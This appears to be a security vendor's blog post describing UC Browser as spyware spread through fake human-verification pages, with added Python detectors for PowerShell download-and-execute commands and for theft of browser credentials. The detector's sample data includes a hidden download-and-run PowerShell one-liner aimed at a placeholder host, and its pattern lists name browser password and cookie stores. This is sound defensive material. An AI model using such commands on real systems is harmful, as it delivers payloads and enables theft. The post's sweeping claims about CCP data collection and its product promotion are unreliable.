While browsing the Web, you can at some point find yourself with an installer file for a program called UC Browser. This dubious program looks like a normal web browser, although it has some strange quirks. In fact, it is a rather dangerous app that only looks like a web browser – that is what my analysis shows. In this article, I will explain what UC Browser is, why it is dangerous, and how to remove it from your system.
What is UC Browser?
UC Browser is a sketchy web browser developed by UCWeb, a subsidiary of the China-based Alibaba group. This fact alone may already worry quite a few users, but I will get to it later. With a market share just below 1%, it does not inspire confidence: a tiny user base means much weaker support for the newest features, including security enhancements.
But features are not the only worry. The main issue with this browser is the way it gets onto the user's system. Although there is an official website, it features nothing but a download button, which is strange considering what official pages typically contain. And that is where the shady story begins.
Dubious Spreading Techniques & Origins
Instead of being distributed from its own website, as all normal browsers are, UC Browser is spread through questionable websites that ask people to download something “to prove they are not a robot”. Users land on such websites while trying to watch or download movies or programs on sites with pirated content. Clicking any element on such a page may redirect you to a site like this:
Aside from the obscure URL, such pages pretend to be human verification services. To prove you are not a robot, they ask visitors to open Command Prompt or PowerShell and run a script that the page has already placed in the clipboard. And, you guessed it, this script does nothing but download and run the UC Browser installer from a remote server.
In fact, the script may download anything at all instead of the installer, including outright malware. We have a separate article about Lumma Stealer spreading in the same manner – consider checking it out.
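The following is an added example, not code from the original article or from UCWeb: a small Python scorer for PowerShell script block text that flags the download-and-execute pattern used by these fake verification pages. It assumes that PowerShell Script Block Logging is enabled, so the pasted command is recorded as event 4104 in the Microsoft-Windows-PowerShell/Operational log, and that you export that text to feed it in. The sample script blocks and the example.invalid host are constructed for illustration.

```python
"""Score PowerShell script block text for download-and-execute behaviour.

Added example for this article (not the author's or UCWeb's code). Assumes
Script Block Logging (event 4104) is on and the ScriptBlockText has been
exported; the samples below are constructed.
"""
import re

# Indicator groups. A block is only scored "download-and-execute" when it hits
# both a fetch pattern and an execute pattern; either alone is common in
# legitimate admin scripts and only warrants review.
FETCH_PATTERNS = [
    r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bcurl\b", r"\bwget\b",
    r"\bInvoke-RestMethod\b", r"\birm\b",
    r"Net\.WebClient", r"\.DownloadString\(", r"\.DownloadFile\(",
    r"\bStart-BitsTransfer\b",
]
EXEC_PATTERNS = [
    r"\bInvoke-Expression\b", r"\biex\b", r"\bStart-Process\b",
    r"\bsaps\b", r"&\s*\$", r"\bmsiexec\b", r"\brundll32\b",
]
# Evasion tells that are typical of pasted one-liners rather than admin work.
EVASION_PATTERNS = [
    r"-w(indowstyle)?\s+hidden",
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    r"FromBase64String", r"-ep\s+bypass", r"-ExecutionPolicy\s+Bypass",
    r"\bGet-Clipboard\b",
]


def _hits(patterns, text):
    """Return the sorted list of patterns that match anywhere in text."""
    return sorted({p for p in patterns if re.search(p, text, re.IGNORECASE)})


def score_script_block(text):
    """Return matched indicator groups plus a verdict for one script block."""
    fetch = _hits(FETCH_PATTERNS, text)
    execute = _hits(EXEC_PATTERNS, text)
    evasion = _hits(EVASION_PATTERNS, text)
    if fetch and execute:
        verdict = "download-and-execute"
    elif fetch or execute or evasion:
        verdict = "review"
    else:
        verdict = "benign"
    return {"fetch": fetch, "execute": execute, "evasion": evasion,
            "verdict": verdict}


# Constructed sample script blocks: one ordinary admin command, one pasted
# "verification" one-liner (host is a placeholder), one plain download.
SAMPLE_SCRIPT_BLOCKS = {
    "admin_inventory": "Get-ChildItem C:\\Users | Select-Object Name, LastWriteTime",
    "fake_captcha_paste": (
        "powershell -w hidden -ep bypass -c \"iwr http://example.invalid/setup.exe "
        "-OutFile $env:TEMP\\setup.exe; Start-Process $env:TEMP\\setup.exe\""
    ),
    "update_check": "Invoke-RestMethod https://example.invalid/version.json",
}

if __name__ == "__main__":
    for label, block in SAMPLE_SCRIPT_BLOCKS.items():
        result = score_script_block(block)
        print(f"{label}: {result['verdict']} "
              f"(fetch={len(result['fetch'])}, exec={len(result['execute'])}, "
              f"evasion={len(result['evasion'])})")
```

On a machine you suspect was hit this way, the same text is also worth checking in the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU if the victim pasted into Win+R rather than into an open console, and in the PowerShell console history file (PSReadLine ConsoleHost_history.txt) under the user's AppData.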
Made in China
Another concerning thing about UC Browser is that it is a piece of Chinese software. China is very keen on collecting excessive amounts of user data from any source, including games, antiviruses and web browsers developed in the country. Having any such software installed on your system quite literally means sharing a large portion of information about yourself with the CCP.
Malicious Functionality of UC Browser
Origins and spreading methods aside, a much more tangible danger comes from UC Browser acting like spyware. And this is far more serious than mere telemetry: the newly installed browser rummages through the data of other browsers, collecting passwords and changing system settings. That is the result I got when testing the installer file downloaded from a fake human verification website.
Of all these, the browser data part is the most worrying. The browser simply dumps the databases where other browsers store user credentials. It also grabs session tokens and cookie files kept in the same folders. You may sometimes see Mozilla or Opera asking whether you want to transfer passwords and user profiles, but that is a deliberate user choice, which is not the case with UC Browser.
After gathering all this data, the rogue browser sends it to a remote server that likely aggregates stolen information from all the attacks. For the sample I collected, there are several such servers, most often compromised shopping websites.
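As an added example (not code from the original article or from UCWeb), here is the detection logic a defender would run over file-access audit records to catch the behaviour described above: a process that is not the owning browser reading another browser's credential, cookie or key files. It assumes object-access auditing is enabled on the browser profile directories (for example Windows Security event 4663 per read) and that those events have been mapped into the simplified record shape used here; the sample events, the user name and the rogue-browser.exe image name are constructed placeholders.

```python
"""Flag processes that read credential stores belonging to another browser.

Added example for this article (not the author's or UCWeb's code). Assumes
file-access auditing is on for browser profile folders (e.g. Windows Security
event 4663) and that each event was mapped to {'process': ..., 'path': ...}.
Sample events below are constructed; rogue-browser.exe is a placeholder name.
"""
from pathlib import PureWindowsPath

# Credential and session stores by file name, mapped to the browser images
# that legitimately open them. Chromium-based browsers share one layout;
# Firefox keeps its own files.
CHROMIUM_OWNERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
FIREFOX_OWNERS = {"firefox.exe"}
STORE_OWNERS = {
    "login data": CHROMIUM_OWNERS,    # saved passwords (SQLite)
    "cookies": CHROMIUM_OWNERS,       # session cookies (SQLite)
    "web data": CHROMIUM_OWNERS,      # autofill and payment data
    "local state": CHROMIUM_OWNERS,   # holds the DPAPI-wrapped key for Login Data
    "logins.json": FIREFOX_OWNERS,    # saved passwords
    "key4.db": FIREFOX_OWNERS,        # key material that decrypts logins.json
    "cookies.sqlite": FIREFOX_OWNERS, # session cookies
}


def store_name(path):
    """Return the lowercase credential-store file name for path, or None."""
    name = PureWindowsPath(path).name.lower()
    return name if name in STORE_OWNERS else None


def flag_cross_browser_access(events):
    """Return the events in which a process reads a store it does not own.

    Each event is a dict with 'process' (image file name) and 'path' keys.
    Reads by the owning browser are ignored; everything else is returned
    with the matched store name attached for triage.
    """
    flagged = []
    for ev in events:
        store = store_name(ev["path"])
        if store is None:
            continue
        if ev["process"].lower() not in STORE_OWNERS[store]:
            flagged.append({**ev, "store": store})
    return flagged


# Constructed sample events: one legitimate read, two by an unknown image,
# one unrelated file access.
SAMPLE_EVENTS = [
    {"process": "chrome.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": "rogue-browser.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": "rogue-browser.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default\logins.json"},
    {"process": "explorer.exe",
     "path": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for hit in flag_cross_browser_access(SAMPLE_EVENTS):
        print(f"{hit['process']} read {hit['store']} -> {hit['path']}")
```

A legitimate import, such as the Firefox or Opera prompt to transfer passwords that the article mentions, also trips this rule, so hits from well-known browser images should be triaged against user-initiated actions. An unknown image reading several stores in a row shortly after an install is the pattern that matters, and the list of flagged stores tells you which browsers' saved passwords and sessions to reset afterwards.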
But could it just be an altered version of the browser that some hackers forced into acting as spyware? I hoped so, and ran the same procedure on the original version as on the malicious one. The result speaks for itself – it acts pretty much the same, with the major difference being a different set of command servers that it connects to.
How to Remove UC Browser?
The verdict on UC Browser is pretty obvious and, well, objective. It is a malicious program and should be removed as soon as possible. Not only does it appear on user devices in a rather undesirable manner, it also compromises all the accounts whose credentials are kept on the system.
To remove UC Browser from the system, I recommend scanning it with GridinSoft Anti-Malware. It will swiftly remove the malicious browser and any other junkware that may be present. Download it by clicking the banner below, and run a Full scan so that the program checks the entire computer.
After the removal, I also recommend resetting all the passwords you have saved on this system. This is a crucial step after every malware attack, and this case is no exception.